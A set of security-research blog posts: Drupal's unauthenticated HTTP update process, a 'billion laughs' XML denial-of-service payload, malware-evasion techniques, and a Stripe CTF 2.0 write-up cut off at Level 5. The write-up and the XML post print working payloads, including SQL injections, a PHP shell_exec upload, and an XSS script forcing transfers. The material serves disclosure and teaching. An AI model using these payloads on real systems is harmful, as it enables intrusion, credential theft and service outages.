RESEARCH | January 6, 2016

Drupal – Insecure Update Process

Just a few days after installing Drupal v7.39, I noticed there was a security update available: Drupal v7.41. This new version fixes an open redirect in the Drupal core. In spite of my Drupal update process checking for updates, according to my local instance, everything was up to date: 

 

Issue #1: Whenever the Drupal update process fails, Drupal states that everything is up to date instead of giving a warning.

 

The issue was due to some sort of network problem. Apparently, in Drupal 6 there was a warning message in place, but this is not present in Drupal 7 or Drupal 8.
 
Nevertheless, if the scheduled update process fails, it is always possible to check for the latest updates by using the link that says “Check Manually“. This link is valuable for an attacker because it can be used to perform a cross-site request forgery (CSRF) attack to force the admin to check for updates whenever they decide:
 
  • http://yoursite/?q=admin/reports/updates/check
 
Since there is a CSRF vulnerability in the “Check manually” functionality (Drupal 8 is the only one not affected), this could also be used as a server-side request forgery (SSRF) attack against drupal.org. Administrators may unwillingly be forcing their servers to request unlimited amounts of information from updates.drupal.org to consume network bandwidth.
 
Issue #2: An attacker may force an admin to check for updates due to a CSRF vulnerability on the update functionality
 
An attacker may care about updates because they are sent unencrypted, as the following Wireshark screenshot shows: 

 

 

To exploit unencrypted updates, an attacker must be suitably positioned to eavesdrop on the victim’s network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection, such as public WiFi, or a corporate or home network that is shared with a compromised computer.  
 
The update process downloads a plaintext version of an XML file at http://updates.drupal.org/release-history/drupal/7.x and checks to see if it is the latest version. This XML document can point to a backdoored version of Drupal.  

 

  1. The current security update (named on purpose “7.41 Backdoored“)
  2. The security update is required and a download link button
  3. The URL of the malicious update that will be downloaded
 
However, updating Drupal is a manual process. Another possible attack vector is to offer a backdoored version of any of the modules installed on Drupal. In the following example, a fake “Additional Help Hint” update is offered to the user:

 

 

Offering fake updates is a simple process. Once requests are being intercepted, a fake update response can be constructed for any module. When administrators click on the “Download these updates” buttons, they will start the update process.
 
This is how it looks from an attacker’s perspective before and after upgrading the “Additional Help Hint” module. First it checks for the latest version, and then it downloads the latest (malicious) version available. 


 

As part of the update, I included a reverse shell from pentestmonkey (http://pentestmonkey.net/tools/web-shells/php-reverse-shell) that will connect back to me, let me interact with the Linux shell, and finally, allow me to retrieve the Drupal database password:


Issue #3: Drupal security updates are transferred unencrypted without checking the authenticity, which could lead to code execution and database access.
 
You may have heard about such things in the past. Kurt Seifried from Linux Magazine wrote an article entitled “Insecure updatesare the rule, not the exception” that mentioned that Drupal (among others) were not checking the authenticity of the software being downloaded. Moreover, Drupal itself has had an open discussion about this issue since April 2012 (https://www.drupal.org/node/1538118). This discussion was reopened after I reported the previous vulnerabilities to the Drupal Security Team on the 11th of November 2015.
 
You probably want to manually download updates for Drupal and their add-ons. At the moment of publishing there are no fixes available.
 

TL;DR – It is possible to achieve code execution and obtain the database credentials when performing a man-in-the-middle attack against the Drupal update process. All Drupal versions are affected.

RESEARCH | November 18, 2014

Die Laughing from a Billion Laughs

Recursion is the process of repeating items in a self-similar way, and that’s what the XML Entity Expansion (XEE)[1] is about: a small string is referenced a huge number of times.

Technology standards sometimes include features that affect the security of applications. Amit Klein found in 2002 that XML entities could be used to make parsers consume an unlimited amount of resources and then crash, which is called a billion laughs attack. When the XML parser tries to resolve, the external entities that are included cause the application to start consuming all the available memory until the process crashes.

This example shows an XML document with an embedded DTD schema that performs the attack.

 (you can copy and paste (without format) to try)
<!DOCTYPE TEST [
 <!ELEMENT TEST ANY>
 <!ENTITY LOL “LOL”>
 <!ENTITY LOL1 “&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;”>
 <!ENTITY LOL2 “&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;”>
 <!ENTITY LOL3 “&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;”>
 <!ENTITY LOL4 “&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;”>
 <!ENTITY LOL5 “&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;”>
 <!ENTITY LOL6 “&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;”>
 <!ENTITY LOL7 “&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;”>
 <!ENTITY LOL8 “&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;”>
 <!ENTITY LOL9 “&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;”>
]>

<TEST>&LOL9;</TEST>

The entity LOL9 in the example will be resolved as the 10 entities defined in LOL8; then each of these entities will be resolved in LOL7 and so on. Finally, the CPU and/or memory will be affected by parsing the 3*109 (3.000.000.000) entities defined in this schema and it could make the parser crash.

The SOAP specification states that a SOAP message must not contain a Document Type Declaration (DTD). Therefore, a SOAP processor can reject any SOAP message that contains a DTD.

Regardless of what the specification indicates, certain SOAP implementations do parse DTD schemas within SOAP messages:

  • CVE-2013-1643: The SOAP parser (in PHP before 5.3.22 and 5.4.x before 5.4.13) allows remote attackers to read arbitrary files via a SOAP WSDL file containing an XML external entity declaration in conjunction with an entity reference.
  • CVE-2010-1632: Apache Axis2 before 1.5.2 (as used in IBM WebSphere Application Server 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products) does not properly reject DTDs in SOAP messages.
  • CVE-2004-2244: The XML parser (in Oracle 9i Application Server Release 2 9.0.3.0 and 9.0.3.1, 9.0.2.3 and earlier, and Release 1 1.0.2.2 and 1.0.2.2.2, and Database Server Release 2 9.2.0.1 and later) allows remote attackers to cause a denial of service with CPU and memory consumption via a SOAP message containing a crafted DTD.

Here is an example of a parser that is not following the specification and is instead referencing a DTD on a SOAP message [2].

 Figure 1: SOAP billion laughs
This vulnerability also affects the Microsoft XML Core Services (MSXML), a service that allows applications to build Windows-native XML-based applications. If you paste the billion laughs attack code into Microsoft Word for Mac, the memory will start getting depleted until Word crashes. You can try it yourself: just copy, paste, and die laughing.
References:
[1] CAPEC-197: XEE (XML Entity Expansion) (http://capec.mitre.org/data/definitions/197.html)
[2] CAPEC-228: Resource Depletion through DTD Injection in a SOAP Message (http://capec.mitre.org/data/definitions/228.html)
INSIGHTS | November 21, 2012

The Future of Automated Malware Generation

This year I gave a series of presentations on “The Future of Automated Malware Generation”. This past week the presentation finished its final debut in Tokyo on the 10th anniversary of PacSec.

Hopefully you were able to attend one of the following conferences where it was presented:

  • IOAsis (Las Vegas, USA)
  • SOURCE (Seattle, USA)
  • EkoParty (Buenos Aires, Argentina)
  • PacSec (Tokyo, Japan)

Motivation / Intro

Much of this presentation was inspired by a number of key motivations:
  1. Greg Hoglund’s talk at Blackhat 2010 on malware attribution and fingerprinting
  2. The undeniable steady year by year increase in malware, exploits and exploit kits
  3. My unfinished attempt in adding automatic classification to the cuckoo sandbox
  4. An attempt to clear up the perception by many consumers and corporations that many security products are resistant to simple evasion techniques and contain some “secret sauce” that sets them apart from their competition
  5. The desire to educate consumers and corporations on past, present and future defense and offense techniques
  6. Lastly to help reemphasize the philosophy that when building or deploying defensive technology it’s wise to think offensively…and basically try to break what you build
Since the point of the talk is the future of automated malware generation, I’ll start with explaining the current state of automated malware generation, and then I’ll move to reviewing current defenses found in most products today.
Given enough time, resources and skill-set, every defense technique can be defeated, to prove this to you I’ll share some of the associated offensive techniques. I will then discuss new defense technologies that you’ll start to hear more about and then, as has been the cycle in any war, to each defense will come a new offensive technique. So I will then discuss the future of automated malware generation. This is a long blog, but I hope you find it interesting!

Current State of Automated Malware Generation

Automated Malware Generation centers on Malware Distribution Networks (MDNs).

MDNs are organized, distributed networks that are responsible for the entire exploit and infection vector.

There are several players involved:

  • Pay-per-install client – organizations that write malware and gain a profit from having it installed on as many machines as possible
  • Pay-per-install services – organizations that get paid to exploit and infect user machines and in many cases use pay-per-install affiliates to accomplish this
  • Pay-per-install affiliates – organizations that own a lot of  infrastructure and processes necessary to compromise web legitimate pages, redirect users through traffic direction services (TDSs), infect users with exploits (in some cases exploit kits) and finally, if successful, download malware from a malware repository.
Figure: Blackhole exploit kit download chain
Source: Manufacturing Compromise: The Emergence of Exploit-as-a-Service 
There are a number of different types of malware repositories, some that contain the same binary for the life-time of a particular attack campaign, some that periodically update or repackage the binary to avoid and evade simple detection techniques, and polymorphic/metamorphic repositories that produce a unique sample for each user request. More complex attacks generally involve the latter.


Figure: Basic Break-down of Malware Repository Types

Current State of Malware Defense

Most Security desktop and network products on the market today use the following techniques to detect malware:
  • hashes cryptographic checksums of either the entire malware file or sections of the file, in some cases these could include black-listing and white-listing
  • signatures – syntactical pattern matching using conditional expressions (in some cases format-aware/contextual)
  • heuristics – An expression of characteristics and actions using emulation, API hooking, sand-boxing, file anomalies and/or other analysis techniques
  • semantics – transformation of specific syntax into a single abstract / intermediate representation to match from using more abstract signatures and heuristics

EVERY defense technique can be broken – with enough time, skill and resources.

In the above defensive techniques:

  • hash-based detection can be broken by changing the binary by a single byte
  • signature-based detection be broken using syntax mutation
    e.g.
    • Garbage Code Insertion e.g. NOP, “MOV ax, ax”, “SUB ax 0”
    • Register Renaming e.g. using EAX instead of EBX (as long as EBX isn’t already being used)
    • Subroutine Permutation – e.g. changing the order in which subroutines or functions are called as long as this doesn’t effect the overall behavior
    • Code Reordering through Jumps e.g. inserting test instructions and conditional and unconditional branching instructions in order to change the control flow
    • Equivalent instruction substitution e.g. MOV EAX, EBX <-> PUSH EBX, POP EAX
  • heuristics-based detection can be broken by avoiding the characteristics the heuristics engine is using or using uncommon instructions that the heuristics engine might be unable to understand in it’s emulator (if an emulator is being used)
  • semantics-based detection can be broken by using techniques such as time-lock puzzle (semantics-based detection are unlikely to be used at a higher level such as network defenses due to performance issues) also because implementation requires extensive scope there is a high likelihood that not all cases have been covered. Semantic-based detection is extremely difficult to get right given the performance requirements of a security product.

There are a number of other examples where defense techniques were easily defeated by proper targeted research (generally speaking). Here is a recent post by Trail of Bits only a few weeks ago [Trail of Bits Blog] in their analysis of ExploitSheild’s exploitation prevention technology. In my opinion the response from Zero Vulnerability Labs was appropriate (no longer available), but it does show that a defense technique can be broken by an attacker if that technology is studied and understood (which isn’t that complicated to figure out).

Malware Trends

Check any number of reports and you can see the rise in malware is going up (keep in mind these are vendor reports and have a stake in the results, but being that there really is no other source for the information we’ll use them as the accepted experts on the subject) [Symantec] [Trend] McAfee [IBM X-Force] [Microsoft] [RSA]

Source: Mcafee Global Q12012 Threat Report
The increase in malware samples has also been said of mobile malware [F-Secure Mobile Threat Report].
Since the rise of malware can’t be matched by continually hiring another analyst to analyze malware (this process has its limitations) security companies deploy high-interaction and low-interaction sandboxes. These sandboxes run the malware, analyze its behavior and attempt to trigger various heuristics that will auto-classify the malware by hash. If it’s not able to auto-classify then typically the malware is added to a suspicious bucket for a malware analyst to manually review…thus malware analysts are bottle necks in the process of preemptive malware classification.
In addition, a report from Cisco last year found that 33% of Web malware encountered was zero-day malware not detectable by traditional signature-based methodologies at the time of encounter [Cisco 2011 4Q Global Threat Report]
33%!! — Obviously means there is work to be done on the detection/defense side of the fence.

So how can the security industry use automatic classification? Well, in the last few years a data-driven approach has been the obvious step in the process.

The Future of Malware Defense

With the increase in more malware, exploits, exploit kits, campaign-based attacks, targeted attacks, the reliance on automation will heave to be the future. The overall goal of malware defense has been to a larger degree classification and to a smaller degree clustering and attribution.

Thus statistics and data-driven decisions have been an obvious direction that many of the security companies have started to introduce, either by heavily relying on this process or as a supplemental layer to existing defensive technologies to help in predictive pattern-based analysis and classification.

Where statistics is a discipline that makes you understand data and forces decisions based on data, machine learning is where we train computers to make statistical decisions on real-time data based on inputted data.
While machine learning as a concept has been around for decades, it’s only more recently that it’s being used in web filtering, data-leakage prevention (DLP), and malware content analysis.

Training machine learning classifiers involves breaking down whatever content you want to analyze e.g. a network stream or an executable file into “features” (basically characteristics).

For example historically certain malware has:

  • No icon
  • No description or company in resource section
  • Is packed
  • Lives in windows directory or user profile

Each of the above qualities/characteristics can be considered “features”. Once the defensive technology creates a list of features, it then builds a parser capable of breaking down the content to find those features. e.g. if the content is a PE WIN32 executable, a PE parser will be necessary. The features would include anything you can think of that is characteristic of a PE file.

The process then involves training a classifier on a positive (malicious) and negative (benign) sample set. Once the classifier is trained it can be used to determine if a future unknown sample is benign or malicious and classify it accordingly.

Let me give you a more detailed example: If you’ve ever played around with malicious PDFs you know there are differences between the structure of a benign PDF and a malicious PDF.
Here are some noteworthy characteristics in the structure of a PDF (FireEye Blog/Presentation – Julia Wolf):
  • Compressed JavaScript
  • PDF header location  e.g %PDF  – within first 1024 bytes
  • Does it contain an embedded file (e.g. flash, sound file)
  • Signed by a trusted certificate
  • Encoded/Encrypted Streams e.g. FlatDecode is used quite a lot in malicious PDFs
  • Names hex escaped
  • Bogus xref table
All the above are features that can be used to feed the classifier during training against benign and malicious sample sets (check out “Scoring PDF structure to detect malicious file” from my friend Rodrigo Montoro (YouTube)

There are two open-source projects that I want to mention using machine learning to determine if a file is malicious:

PDF-XRay from Brandon Dixon:

An explanation of how it works from the pdf-xray site is as follows:

Adobe Open Source Malware Classification Tool by Karthik Raman/Adobe

Details (from website): Perform quick, easy classification of binaries for malware analysis.
Published results: 98.21% accuracy, 6.7% false positive rate
7 features = DebugSize, ImageVersion, IatRVA, ExportSize, ResourceSize, VirtualSize2, NumberOfSections
Personal remarks: This tool is a great proof of concept, but my results weren’t as successful as Karthik’s  results which I’m told were only on binaries that were not packed, my sample set included packed, unpacked, and files that had never been packed.


Shifting away from analysis of files, we can also attempt to classify shellcode on the wire from normal traffic. Using marchov chains which is a discipline of Artificial Intelligence, but in the realm of natural language processing, we can determine and analyze a network stream of instructions to see if the sequence of instructions are likely to be exploit code.

The below example is attempting to show that most exploit code (shellcode) follows a basic skeleton, be it a decoder loop, decoding a payload and then jumping to that payload or finding the delta, getting the kernel32 imagebase, resolving the addresses for GetProcAddress and LoadLibraryA, calling various functions and finally executing the rest of your payload.
There are a finite set of published methods to do this, and if you can use semantics, you can further limit the possible sequences and determine if the network stream are instructions and further if those instructions are shellcode.

The Future of Automated Malware Generation

In many cases the path of attack and defense techniques follows the same story of cat and mouse. Just like Tom and Jerry, the chase continues forever, in the context of security, new technology is introduced, new attacks then emerge and in response new countermeasures are brought in to the detection of those attacks…an attacker’s game can come to an end IF they makes a mistake, but whereas cyber-criminal organizations can claim a binary 0 or 1 success or failure, defense can never really claim a victory over all it’s attackers. It’s a “game” that must always continue.

That being said you’ll hear more and more products and security technologies talk about machine learning like it’s this unbeatable new move in the game….granted you’ll hear it mostly from savvy marketing, product managers or sales folks. In reality it’s another useful layer to slow down an attacker trying to get to their end goal, but it’s by no means invincible.

Use of machine learning  can be taken circumvented by an attacker in several possible ways:

  • Likelihood of false positives / false negatives due to weak training corpus 
  • Circumvention of classification features
  • Inability to parse/extract features from content
  • Ability to poison training corpus
Let’s break down each of those points, because if the next stage of defense will increasingly include machine learning, then attackers will be attempting to include various evasion techniques to avoid this new detection technique.
Likelihood of false positives / false negatives due to weak training corpus
If the defense side creates models based on a small sample set or a sample set that doesn’t represent a diverse enough sample set than the model will be too restrictive and thus have false negatives. If a product has too many false-positives, users won’t trust it, and if given the choice ignore the results. Products that typically have too many false positives will be discontinued. Attackers can benefit from a weak training corpus by using less popular techniques/vulnerabilities that most likely haven’t been used in training and won’t be caught by the classifier.
If the defense creates models based only on malicious files and not enough benign files then there will be tons of false positives. Thus, if the attacker models their files to look more representative of good files, there will be a higher likelihood that the acceptable threshold to mitigate false positives will allow the malicious file through.
Circumvention of classification features
At the start of this blog I mentioned that I’m currently attempting to add automatic classification to the cuckoo sandbox, which is an open source behavioral analysis framework. If I were to add such code, it would be open source and any techniques including features would be exposed. Thus, all an attacker would have to do is read my source code, and avoid the features; this is also true for any product that an attacker can buy or demo. They could either read the source code or reverse engineer the product and see which features are being used and attempt to trick the classification algorithm if the threshold/weights/characteristics can be determined.
Inability to parse/extract features from content
Classification using machine learning is 100% reliant on the fact that the features can be extracted from the content and feed to the classification algorithm, but what if the executable is a .NET binary (Japanese Remote Control Virus) and the engine can’t interpret .NET binaries, or if the  format changes, or gets updated e.g. PDF 2.0. For each of these changes, a parser must be built, updated and shipped out. Attackers have the advantage of a window of time between product updates, or again with proper research, an understanding that certain products simply can’t handle a particular format in order to extract features.
Ability to poison training corpus
Training a machine learning classifier involves training the algorithm against a known malicious set and a known benign set. If an attacker were able to poison either set, the results and final classification determination would be flawed. This can occur numerous ways. For example: the attacker releases a massive set of files onto the Internet in the off chance that a security product company will use it as its main source of samples, or they poison a number of known malware behavior frameworks such as VirusTotal or malwr, that share samples with security companies, with bogus malware. This scenario is unlikely, because most companies wouldn’t rely on one major source for all their testing, but still worth mentioning.

Conclusion

In reality, we haven’t yet seen malware that contains anti machine learning classification or anti-clustering techniques. What we have seen is more extensive use of on-the-fly symmetric-key encryption where the key isn’t hard-coded in the binary itself, but uses something unique about the target machine that is being infected. Take Zeus for example that makes use of downloading an encrypted binary once the machine has been infected where the key is unique to that machine, or Gauss who had a DLL that was encrypted with a key only found on the targeted user’s machine.

What this accomplishes is that the binary can only work the intended target machine, it’s possible that an emulator would break, but certainly sending it off to home-base or the cloud for behavioral and static analysis will fail, because it simply won’t be able to be decrypted and run.

Most defensive techniques if studied, targeted and analyzed can be evaded — all it takes is time, skill and resources. Using Machine learning to detect malicious executables, exploits and/or network traffic are no exception. At the end of the day it’s important that you at least understand that your defenses are penetrable, but that a smart layered defense is key, where every layer forces the attackers to take their time, forces them to learn new skills and slowly gives away their resources, position and possibly intent — hopefully giving you enough time to be notified of the attack and cease it before ex-filtration of data occurs. What a smart layered defense looks like is different for each network depending on where your assets are and how your network is set up, so there is no way for me to share a one-size fits all diagram, I’ll leave that to you to think about.

Useful Links:
Coursera – Machine Learning Course
CalTech – Machine Learning Course
MLPY (https://mlpy.fbk.eu/)
PyML (http://pyml.sourceforge.net/)
Milk (http://pypi.python.org/pypi/milk/)
Shogun (http://raetschlab.org/suppl/shogun) Code is in C++ but it has a python wrapper.
MDP (http://mdp-toolkit.sourceforge.net) Python library for data mining
PyBrain (http://pybrain.org/)
Orange (http://www.ailab.si/orange/) Statistical computing and data mining
PYMVPA (http://www.pymvpa.org/)
scikit-learn (http://scikit-learn.org): Numpy / Scipy / Cython implementations for major algorithms + efficient C/C++ wrappers
Monte (http://montepython.sourceforge.net) a software for gradient-based learning in Python
Rpy2 (http://rpy.sourceforge.net/): Python wrapper for R


About Stephan
Stephan Chenette has been involved in computer security professionally since the mid-90s, working on vulnerability research, reverse engineering, and development of next-generation defense and attack techniques. As a researcher he has published papers, security advisories, and tools. His past work includes the script fragmentation exploit delivery attack and work on the open source web security tool Fireshark.

Stephan is currently the Director of Security Research and Development at IOActive, Inc.
Twitter: @StephanChenette

INSIGHTS | August 29, 2012

Stripe CTF 2.0 Write-Up

Hello, World!

I had the opportunity to play and complete the 2012 Stripe CTF 2.0 this weekend. I would have to say this was one of the most enjoyable CTF’s I’ve played by far.  They did an excellent job. I wanted to share with you a detailed write-up of the levels, why they’re vulnerable, and how to exploit them. It’s interesting to see how multiple people take different routes on problems, so I’ve included some of the solutions by Michael Milvich (IOActive), Ryan O’Horo(IOActive), Ryan Linn(Spiderlabs), as well as my own (Joseph Tartaro, IOActive).
I hope this write-up gives you guys the opportunity to learn something new or get a better understanding of how I  approached this CTF. I’ve included all the main source code that was available at the information page of each level, even if it was unnecessary, just so people could see it all if they were interested. If you have any further questions you should feel free to e-mail me at Joseph.Tartaro[at]ioactive[dot]com, or make a comment below.
Lets get started!
Level 0  –  SQL Injection
Level 1  –  Misuse of PHP Function on Untrusted Data
Level 2  –  File Upload Vulnerability
Level 3  –  SQL Injection
Level 4  –  XSS/XSRF
Level 5  –  Insecure Communication
Level 6  –  XSS/XSRF
Level 7  –  SHA1 Length-Extension Vulnerability
Level 8  –  Side Channel Attack
Source Code 

Level 0:

Welcome to Capture the Flag! If you find yourself stuck or want to learn more about web security in general, we’ve prepared a list of helpful resources for you. You can chat with fellow solvers in theCTF chatroom (also accessible in your favorite IRC client atirc://irc.stripe.com:+6697/ctf).
We’ll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes
You can access the Secret Safe at https://level00-2.stripe-ctf.com/user-juwcldvclk. The Safe’s code is included below, and can also be obtained via git clone https://level00-2.stripe-ctf.com/user-juwcldvclk/level00-code.

So quickly looking at the code, the main areas we’re interested in are right here ….

*SNIP*

sqlite3 = require('sqlite3'); // SQLite (database) driver

*SNIP*

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

renderPage(res, {namespace: namespace, secrets: secrets});
});

We can see that it’s querying the SQL database with our user-supplied input. We also know that it is an sqlite3 database. When looking at the SQL statement, we can see that it’s using the LIKE operator, which happens to have a wildcard character (%). When we supply the wildcard character, it will respond with all the secrets in the database.

Level 1:

Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you’ll be given the password to access Level 2! We’ve been assured that this level has no security vulnerabilities in it (and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn’t be able to extract the password anyway), so you’ll probably just have to try all the possible combinations. Or will you…?
You can play the Guessing Game at https://level01-2.stripe-ctf.com/user-jkcftciszp. The code for the Game can be obtained fromgit clone https://level01-2.stripe-ctf.com/user-jkcftciszp/level01-code, and is also included below.
So quickly looking at the code, here’s the block we’re interested in….
    <?php
      $filename = 'secret-combination.txt';
      extract($_GET);
      if (isset($attempt)) {
        $combination = trim(file_get_contents($filename));
        if ($attempt === $combination) {
          echo "<p>How did you know the secret combination was" .
               " $combination!?</p>";
          $next = file_get_contents('level02-password.txt');
          echo "<p>You've earned the password to the access Level 2:" .
               " $next</p>";
        } else {
          echo "<p>Incorrect! The secret combination is not $attempt</p>";
        }
      }
    ?>
So let’s step through the code and see what’s happening:
    • creates $filename storing ‘secret-combination.txt’
    • extract $_GET (all GET parameters supplied by the user)
    • if $attempt is set:
    • declare $combination with the trim()’d contents of $filename
    • if $attempt and $combination are equal
      • print contents of ‘level02-password.txt’
    • else
      • print incorrect
So let’s look at what extract() is actually doing…

<br

>

int extract ( array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]] )
Import variables from an array into the current symbol table.
Checks each key to see whether it has a valid variable name. It also checks for collisions with existing variables in the symbol table.
If  extract_type  is not specified, it is assumed to be  EXTR_OVERWRITE.
Well, look at that, they didn’t specify an extract_type, so by default it is EXTR_OVERWRITE, which is,  “If there is a collision, overwrite the existing variable.”
There was even a nice little warning for us,
Do not use extract() on untrusted data, like user input (i.e. $_GET$_FILES, etc.).
So now looking back at the code, we can see that they declare $filename before they use extract(), so this gives us the opportunity to create a collision and overwrite the existing variable with our GET parameters.

In simple terms, it will create variables depending on what you supply in your GET request. In this case we can see that our request /?attempt=SECRET creates a variable $attempt that stores the value “SECRET”, so we could also send ”/?attempt=SECRET&filename=random_file.txt”. The extract() will now overwrite their original $filename with our supplied value, ”random_file.txt”.

So what can we do to make these match? You see how $combination is storing the result of file_get_contents() for the $filename, then using trim() on it. If file_get_contents() returns false due to a file not existing, trim() will then return an empty string. So if we supply a file that does not exist and an empty $attempt, they will match…
So let’s supply:
/?attempt=&filename=file_that_does_not_exist.txt

Level 2:

You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days, so we decided to build one for CTF. Please fill out your profile at https://level02-2.stripe-ctf.com/user-alucnmpgjr. You may even be able to find the password for Level 3 by doing so.
The code for the Social Network can be obtained from git clone https://level02-2.stripe-ctf.com/user-alucnmpgjr/level02-code, and is also included below.
So, this one is pretty simple. The areas we’re interested in are:
*snip*

$dest_dir = "uploads/";

*snip*

<form action="" method="post" enctype="multipart/form-data">
   <input type="file" name="dispic" size="40" />
   <input type="submit" value="Upload!">
</form>
 
<p>
   Password for Level 3 (accessible only to members of the club):
   <a href="password.txt">password.txt</a>

 
*snip*
Looking at this, we have an ‘uploads’ directory that that we can access, and a form that we can use to upload images. They have no security in place to check for file-specific file extensions at all. Let’s try uploading a file, but not an image–a php script.
<?php
$output = shell_exec(‘cat ../password.txt’);
echo “<pre>$output</pre>”;
?>
Then just browse to the /uploads/ dir and click on your uploaded php file.

Level 3:

After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like Unbreakable Linux). The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.
A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out athttps://level03-2.stripe-ctf.com/user-cmzqxoblip. As usual, you can fetch the code for the level (and some sample data) via git clone https://level03-2.stripe-ctf.com/user-cmzqxoblip/level03-code, or you can read the code below.

Ok, so let’s look at some important parts. We know it’s sqlite3 again and how it is setup:

# CREATE TABLE users (
#   id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
#   username VARCHAR(255),
#   password_hash VARCHAR(255),
#   salt VARCHAR(255)
# );
And
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

res = cursor.fetchone()
if not res:
return There’s no such user {0}!n.format(username)
user_id, password_hash, salt = res

calculated_hash = hashlib.sha256(password + salt)
if calculated_hash.hexdigest() != password_hash:
return That’s not the password for {0}!n.format(username)

So we can see that the statement is using our supplied username, which has an SQL injection of course. They’re selecting the id, password_hash, and salt from users where the username equals our input. Let’s load up our own sample database, make some test queries and, see what happens….

sqlite> insert into users values (“myid”, “myusername”, “0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60”, “SUPER_SECRET_SALT”);
sqlite> select id, password_hash, salt FROM users where username = ‘myusername’;
myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
 So, let’s do a union select after and supply exactly what we would like back.
sqlite> select id, password_hash, salt FROM users where username = ‘myusername’ union select ‘new id’, ‘new hash’, ‘new salt’;
myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
new id|new hash|new salt

As you can see, by using a union select we can define in the content of the response. The ‘new id’, ‘new hash’, and ‘new salt’ was in our response. After looking at the code when it does the compare, we can see that it does a sha256(password + salt) and compares it to what was in the response for the sql statement.

Let’s supply our own hash and compare them to each other!
>>> import hashlib
>>> print hashlib.sha256(“lolpassword” + “lolsalt”).hexdigest()
dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5
>>>
We just created our new sha256 hash with the salt ‘lolsalt’; let’s now submit our new hash injection into the SQL statement.

username: z’%20union%20select%20’1′,’dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5′,’lolsalt

password:
lolpassword

The code will now take the password you submitted, hash it with the salt returned from the sql query, then compare it to the hash that was in the response (the salt and hashes that are in the response were the ones we supplied in our injection). This will lead to them matching and you receiving a message similar to this:
Welcome back! Your secret is: “The password to access level04 is: aZnRbEpSfX” (Log out)

Level 4:

The Karma Trader is the world’s best way to reward people for good deeds: https://level04-2.stripe-ctf.com/user-xjqcwqqyvp. You can sign up for an account, and start transferring karma to people who you think are doing good in the world. In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.
The very active user karma_fountain has infinite karma, making it a ripe account to obtain (no one will notice a few extra karma trades here and there). The password for karma_fountain‘s account will give you access to Level 5.
You can obtain the full, runnable source for the Karma Trader fromgit clone https://level04-2.stripe-ctf.com/user-xjqcwqqyvp/level04-code. We’ve included the most important files below.
This is a nice little XSS/XSRF challenge. The goal here is to get that karma_fountain to send you some karma, which in turn will let you view their password.
 When registering a new account, you can insert malicious code into the password field, which will then be displayed once you send someone karma because the application is designed to show users your password once they receive karma.
In this situation they’re including JQuery, so it makes our lives even easier when trying to make requests. The idea is to inject some malicious code into the karma_fountains page that will automatically make them transfer you some karma.
I went and created a new user named ‘whoop’ with the password:
‘<script>$.post(“transfer”, { to: “whoop”, amount: “2” } );</script>’
So, now that you can login, send some karma to the karma_fountain and wait… eventually the karma_fountain user will view their page and your injected code will force them to transfer karma to the user ‘whoop’.
Refresh your page until you can view karma fountain’s password on the right.

Level 5:

Many attempts have been made at creating a federated identity system for the web (see OpenID, for example). However, none of them have been successful. Until today.
The DomainAuthenticator is based off a novel protocol for establishing identities. To authenticate to a site, you simply provide it username, password, and pingback URL. The site posts your credentials to the pingback URL, which returns either “AUTHENTICATED” or “DENIED”. If “AUTHENTICATED”, the site considers you signed in as a user for the pingback domain.
You can check out the Stripe CTF DomainAuthenticator instance here:https://level05-1.stripe-ctf.com/user-qoqflihezv. We’ve been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine…
To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. Though, you’ve heard that someone forgot to internally firewall off the high ports from the Level 2 server.
Interesting in setting up your own DomainAuthenticator? You can grab the source from git clone https://level05-1.stripe-ctf.com/user-qoqflihezv/level05-code, or by reading on below.
So, this problem is just… insecure communication in general. There are a couple of issues here.
This  code block checks to see if it was a POST but doesn’t check if parameters supplied were on the GET or POST lines:
    post '/*' do
      pingback = params[:pingback]
      username = params[:username]
      password = params[:password]
This is an insecure way of checking if we’re Authenticated…
